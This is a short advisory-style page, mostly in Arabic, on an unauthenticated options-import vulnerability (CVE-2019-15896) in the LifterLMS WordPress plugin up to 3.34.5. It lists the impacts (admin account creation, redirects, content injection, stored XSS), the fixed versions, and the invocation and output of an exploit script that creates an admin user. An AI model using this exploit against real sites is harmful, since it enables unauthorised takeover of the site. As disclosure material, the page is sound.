
LifterLMS <= 3.34.5 - استيراد الخيارات بدون مصادقة
LifterLMS <= 3.34.5 - استيراد الخيارات غير المصادق عليه
استيراد الخيارات غير المصادق عليه، والذي قد يؤدي إلى
إعادة توجيه الموقع
إنشاء حساب مسؤول
حقن المحتوى
XSS مخزّن
تم الإبلاغ عن إصلاح هذه المشكلات في الإصدار 3.35.0. ومع ذلك، أضاف الإصدار 3.35.1 مزيدًا من تنقية المدخلات وتصفيتها.
$ python3 CVE-2019-15896.py --url http://wordpress.lan --username radmin --email [email protected] LifterLMS <= 3.34.5 - Unauthenticated Options Import Exploit By Ramdom Robbie Once ran check your email for the forgotten password link. Password reset email sent to [email protected]
معلومات
---
Requires access to login.php and working email address and the site needs to be able to send emails